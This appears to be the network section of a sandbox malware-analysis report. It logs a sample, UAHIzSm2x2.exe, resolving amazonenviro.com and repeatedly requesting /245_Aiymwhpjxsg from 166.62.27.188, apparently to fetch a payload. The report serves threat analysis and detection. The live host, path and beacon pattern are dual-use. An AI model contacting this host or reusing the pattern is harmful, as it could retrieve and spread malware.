                    Jan 14, 2025 08:25:52.613387108 CET44350092166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:52.614785910 CET50092443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:52.659342051 CET44350092166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.190331936 CET44350092166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.190514088 CET44350092166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.190613031 CET50092443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.191374063 CET50092443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.191392899 CET44350092166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.191406012 CET50092443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.191411972 CET44350092166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.305999994 CET5009380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.310833931 CET8050093166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.310925961 CET5009380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.311070919 CET5009380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.312959909 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.315901041 CET8050093166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.315965891 CET5009380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.317781925 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.627576113 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.628896952 CET50094443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.628941059 CET44350094166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.629035950 CET50094443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.629359961 CET50094443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:53.629379034 CET44350094166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:53.680380106 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:54.516577005 CET44350094166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:54.516715050 CET50094443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:54.518486977 CET50094443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:54.518498898 CET44350094166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:54.518759012 CET44350094166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:54.520116091 CET50094443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:54.563338995 CET44350094166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.100548029 CET44350094166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.100954056 CET44350094166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.101030111 CET50094443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.101072073 CET50094443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.101088047 CET44350094166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.101103067 CET50094443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.101108074 CET44350094166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.215244055 CET5009580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.220161915 CET8050095166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.220292091 CET5009580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.220488071 CET5009580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.222234964 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.225311041 CET8050095166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.225392103 CET5009580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.227011919 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.532463074 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.534301043 CET50096443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.534347057 CET44350096166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.534485102 CET50096443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.534807920 CET50096443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:55.534825087 CET44350096166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:55.581268072 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:56.420701027 CET44350096166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:56.420845985 CET50096443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:56.422147036 CET50096443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:56.422158003 CET44350096166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:56.422405005 CET44350096166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:56.423660040 CET50096443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:56.467353106 CET44350096166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.000153065 CET44350096166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.000374079 CET44350096166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.000474930 CET50096443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.001396894 CET50096443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.001410961 CET44350096166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.001425982 CET50096443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.001431942 CET44350096166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.114929914 CET5009780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.119864941 CET8050097166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.119971037 CET5009780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.132229090 CET5009780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.137135029 CET8050097166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.137217045 CET5009780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.192383051 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.198122978 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.502397060 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.503818035 CET50098443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.503859997 CET44350098166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.503922939 CET50098443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.504240990 CET50098443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:57.504256964 CET44350098166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:57.545284033 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:58.402772903 CET44350098166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:58.402904987 CET50098443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:58.404122114 CET50098443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:58.404129982 CET44350098166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:58.404381990 CET44350098166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:58.405560017 CET50098443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:58.451329947 CET44350098166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:58.987871885 CET44350098166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:58.988276958 CET44350098166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:58.988348961 CET50098443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:58.988384008 CET50098443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:58.988398075 CET44350098166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:59.100399971 CET5009980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:59.105281115 CET8050099166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:59.105401039 CET5009980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:59.105707884 CET5009980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:59.107225895 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:59.110543966 CET8050099166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:59.110600948 CET5009980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:59.111979961 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:59.417500973 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:59.418838978 CET50100443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:59.418898106 CET44350100166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:59.418958902 CET50100443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:59.419302940 CET50100443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:25:59.419320107 CET44350100166.62.27.188192.168.2.6
                    Jan 14, 2025 08:25:59.462353945 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:00.326152086 CET44350100166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:00.326241016 CET50100443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:00.327636957 CET50100443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:00.327646017 CET44350100166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:00.327887058 CET44350100166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:00.329318047 CET50100443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:00.371366978 CET44350100166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:00.912813902 CET44350100166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:00.913198948 CET44350100166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:00.913305998 CET50100443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:00.913338900 CET50100443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:00.913353920 CET44350100166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:00.913364887 CET50100443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:00.913372040 CET44350100166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:01.025954008 CET5010180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:01.031358957 CET8050101166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:01.031459093 CET5010180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:01.031692982 CET5010180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:01.033447981 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:01.036689043 CET8050101166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:01.036767006 CET5010180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:01.038587093 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:01.344388008 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:01.346060038 CET50102443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:01.346117020 CET44350102166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:01.346225977 CET50102443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:01.346513987 CET50102443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:01.346529961 CET44350102166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:01.392327070 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.259072065 CET44350102166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:02.259161949 CET50102443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.269539118 CET50102443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.269556999 CET44350102166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:02.269797087 CET44350102166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:02.271351099 CET50102443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.315330982 CET44350102166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:02.862967014 CET44350102166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:02.863640070 CET44350102166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:02.863723993 CET50102443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.863776922 CET50102443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.863799095 CET44350102166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:02.863809109 CET50102443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.863816023 CET44350102166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:02.977121115 CET5010380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.982007980 CET8050103166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:02.982101917 CET5010380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.982264996 CET5010380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.983891964 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.987173080 CET8050103166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:02.987251997 CET5010380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:02.988765001 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:03.294997931 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:03.296427965 CET50104443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:03.296442032 CET44350104166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:03.296513081 CET50104443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:03.296992064 CET50104443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:03.297005892 CET44350104166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:03.342257977 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.207726955 CET44350104166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:04.207808971 CET50104443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.209045887 CET50104443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.209055901 CET44350104166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:04.209304094 CET44350104166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:04.210464954 CET50104443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.251336098 CET44350104166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:04.800362110 CET44350104166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:04.800643921 CET44350104166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:04.800709009 CET50104443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.801419973 CET50104443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.801440001 CET50104443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.801446915 CET44350104166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:04.801461935 CET44350104166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:04.915793896 CET5010580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.920638084 CET8050105166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:04.920773029 CET5010580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.920914888 CET5010580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.922523022 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.925774097 CET8050105166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:04.925843954 CET5010580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:04.927319050 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:05.233359098 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:05.234848976 CET50106443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:05.234884024 CET44350106166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:05.234986067 CET50106443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:05.235342026 CET50106443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:05.235356092 CET44350106166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:05.285290003 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.144577980 CET44350106166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:06.144654989 CET50106443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.146501064 CET50106443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.146507025 CET44350106166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:06.146873951 CET44350106166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:06.148550987 CET50106443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.191349030 CET44350106166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:06.730027914 CET44350106166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:06.730254889 CET44350106166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:06.730319023 CET50106443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.730405092 CET50106443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.730417013 CET44350106166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:06.730438948 CET50106443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.730444908 CET44350106166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:06.843475103 CET5010780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.848346949 CET8050107166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:06.848423958 CET5010780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.848532915 CET5010780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.849942923 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.853419065 CET8050107166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:06.853493929 CET5010780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:06.854785919 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:07.160624981 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:07.161978960 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:07.162026882 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:07.162108898 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:07.162408113 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:07.162419081 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:07.211272955 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.062257051 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.062325001 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.063486099 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.063489914 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.063684940 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.064759016 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.107328892 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.648893118 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.648968935 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.649032116 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.649175882 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.649192095 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.649203062 CET50108443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.649208069 CET44350108166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.761706114 CET5010980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.766623020 CET8050109166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.766741991 CET5010980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.766922951 CET5010980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.768636942 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.771766901 CET8050109166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:08.771851063 CET5010980192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:08.773432016 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.078969955 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.080537081 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.080581903 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.080671072 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.080965042 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.080976009 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.126279116 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.994039059 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.994141102 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.995368958 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:09.995374918 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.995615959 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:09.996701956 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.043334961 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.585450888 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.585764885 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.585870028 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.585980892 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.585992098 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.586004019 CET50110443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.586009979 CET44350110166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.699958086 CET5011180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.705002069 CET8050111166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.705111980 CET5011180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.705202103 CET5011180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.706983089 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.710163116 CET8050111166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:10.710223913 CET5011180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:10.711827993 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:11.017462969 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:11.018816948 CET50112443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:11.018850088 CET44350112166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:11.018949032 CET50112443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:11.019354105 CET50112443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:11.019395113 CET44350112166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:11.059329987 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:11.902421951 CET44350112166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:11.902566910 CET50112443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:26:16.019196033 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:26:16.023020029 CET4971280192.168.2.6166.62.27.188

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2025 08:24:08.115179062 CET5062953192.168.2.61.1.1.1
                    Jan 14, 2025 08:24:08.149399042 CET53506291.1.1.1192.168.2.6

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jan 14, 2025 08:24:08.115179062 CET192.168.2.61.1.1.10x7ad1Standard query (0)amazonenviro.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jan 14, 2025 08:24:08.149399042 CET1.1.1.1192.168.2.60x7ad1No error (0)amazonenviro.com166.62.27.188A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • amazonenviro.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.649712166.62.27.188806228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    Jan 14, 2025 08:24:08.190970898 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:09.177887917 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:08 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:11.171236992 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:11.481756926 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:11 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:13.135656118 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:13.446264982 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:13 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
